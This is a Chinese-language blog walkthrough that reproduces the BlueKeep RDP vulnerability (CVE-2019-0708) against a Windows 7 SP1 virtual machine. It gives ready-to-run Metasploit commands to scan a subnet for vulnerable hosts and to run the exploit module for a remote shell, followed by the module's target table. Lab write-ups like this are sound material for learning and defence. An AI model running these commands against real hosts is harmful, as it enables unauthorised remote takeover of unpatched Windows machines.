漏洞介绍

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。

从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。

BlueKeep-Header.png

靶场环境

漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,

  • 001使用VM安装Windows7 SP1模拟受害机
    Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):

迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx

  • 002 msf配置
    下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp

    扫描存在漏洞的主机

    msfconsole
    search 0708 #扫描可用模块
    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块
    set RHOSTS 192.168.1.1/24 #设置扫描地址池
    run

    请输入图片描述
    如图,可以扫描到当前网段有设备192.168.1.8存在该漏洞。

    漏洞利用

    利用msf攻击

    在利用msf攻击时,需要注意配置RHOSTStarget这两个参数

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (当前靶机为虚拟机安装的win7)
run

成功得到shell
请输入图片描述
target参数

Exploit target:

   Id  Name
   --  ----
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏